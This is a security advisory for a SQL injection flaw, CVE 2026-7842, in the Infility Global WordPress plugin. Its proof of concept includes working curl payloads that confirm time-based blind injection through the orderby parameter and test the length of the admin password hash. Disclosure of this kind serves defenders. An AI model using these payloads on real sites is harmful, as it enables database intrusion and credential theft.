Infility Global < 2.15.20 – Editor+ SQL Injection via orderby Parameter | CVE 2026-7842

Description

The Infility Global plugin for WordPress does not sanitize or validate the orderby and order parameters in the import_list(), url_detail(), and file_detail() admin page callbacks before using them in SQL queries, allowing authenticated attackers with Editor-level access or higher to perform time-based blind SQL injection and extract sensitive data from the database. The ImportData module must be enabled via the plugin's module toggle page.

Proof of Concept

Prerequisites:
- Enable the ImportData module on the plugin's toggle page (wp-admin/admin.php?page=infility_global, click the ImportData toggle to ON)
- At least one import must exist (use the plugin's import feature to create one)

1. Log in as an Editor user
2. Navigate to the Infility Import page (wp-admin/admin.php?page=infility_import)
3. Append a SLEEP payload to the orderby parameter:

curl -b cookies.txt 'https://{TARGET}/wp-admin/admin.php?page=infility_import&orderby=(SELECT+SLEEP(3))&order=ASC'

4. The response takes ~3 seconds (vs ~0.04s baseline), confirming the injection

5. Data extraction example (checks if admin password hash length > 10):

curl -b cookies.txt 'https://{TARGET}/wp-admin/admin.php?page=infility_import&orderby=(SELECT+IF((SELECT+LENGTH(user_pass)+FROM+wp_users+WHERE+ID=1)>10,SLEEP(2),0))&order=ASC'

6. Response takes ~2 seconds, confirming conditional data extraction is possible